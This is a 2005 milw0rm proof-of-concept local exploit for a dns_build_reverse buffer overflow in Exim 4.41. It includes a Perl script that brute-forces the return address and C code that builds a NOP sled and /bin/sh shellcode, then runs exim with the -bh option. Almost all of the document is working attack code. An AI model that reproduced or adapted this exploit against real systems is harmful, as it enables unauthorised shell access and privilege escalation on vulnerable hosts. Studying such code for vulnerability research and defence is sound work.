1 /* 2 This proof−of−concept demonstrates the existence of the vulnerability 3 reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05). 4 It has been tested against exim−4.41 under Debian GNU/Linux. 5 Note that setuid () is not included in the shellcode to avoid 6 script−kidding. 7 My RET is 0xbffffae4, but fb.pl can brute−force it for you. 8 9 −−−−−−−−−−− 10 Brute Force fb.pl: 11 −−−−−−−−−−− 12 13 #!/usr/bin/perl 14 15 $cnt = 0xbffffa10; 16 17 while (1) { 18 $hex = sprintf ("0x%x", $cnt); 19 $res = system ("./exploit $hex"); 20 printf "$hex : $res\n"; 21 $cnt += 4; 22 } 23 24 −−−−−−−−− 25 exploit.c: 26 −−−−−−−−− 27 */ 28 29 #define NOP 0x90 30 #define TAMBUF 368 31 #define INIC_SH 20 32 #include <stdlib.h> 33 34 int main (int argc, char **argv) { 35 36 static char shellcode[]= 37 "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" 38 "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e" 39 "\x2f\x73\x68\x58"; 40 41 char buffer [TAMBUF + 1]; 42 char cadena [TAMBUF + 5]; 43 int cont; 44 unsigned long ret = strtoul (argv[1], NULL, 16); 45 46 for (cont = 0; cont < TAMBUF / 4; cont++) 47 *( (long *) buffer + cont) = ret; 48 49 for (cont = 0; cont < strlen (shellcode); cont++) 50 buffer [cont + INIC_SH] = shellcode [cont]; 51 52 for (cont = 0; cont < INIC_SH; cont++) Page 1/2 Exim 4.41 dns_build_reverse Local Exploit PoC Rafael Carrasco 01/15/2005 53 buffer [cont] = NOP; 54 55 buffer [TAMBUF] = 0; 56 printf ("RET = 0x%x\n", ret); 57 strcpy (cadena, "::%A"); 58 strcat (cadena, buffer); 59 execl ("/usr/sbin/exim", "./exim", "−bh", cadena, (char *) 0); 60 } 61 62 // milw0rm.com [2005−01−15] Page 2/2 Exim 4.41 dns_build_reverse Local Exploit PoC Rafael Carrasco 01/15/2005